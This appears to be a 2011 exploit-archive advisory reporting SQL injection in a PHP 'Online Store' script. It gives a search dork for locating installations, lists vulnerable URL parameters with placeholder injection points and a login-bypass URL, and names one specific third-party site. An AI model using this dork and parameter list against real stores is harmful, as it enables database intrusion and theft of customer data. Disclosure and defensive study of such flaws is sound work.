Online Store php script SQL Injection Vulnerability

2011.03.21

Credit: kurd-team

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

f0und by: kurdish hackers team
group: kurd-team
c0ntact: pshela@yahoo.com
site: www.kurdteam.org
=================================
==============script===============
=================================
script: Online Store
d0rk:Copyrights &#169; 2009 - Online Store. All rights reserved. Powered by: PreProjects

Price:$30
http://www.webscriptsdirectory.com/PHP/E-Commerce/Online-store-php-script-L3370/
=============================
Expl0it:

detail.php?prodid=[SQL]
view_wishlist.php?products_id=[SQL]
moreImage.php?prod_id=[SQL]
product2.php?loginn=confirmed&a=&b=&submit=+++Login+++     [empty Query ]
products.php?cid=21&sid=558&skip=[SQL]
http://www.uaekarobar.com/gstatus.php?code=[SQL]

=============================
zryan_kurd ,r00t_SyS

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Online Store php script SQL Injection Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.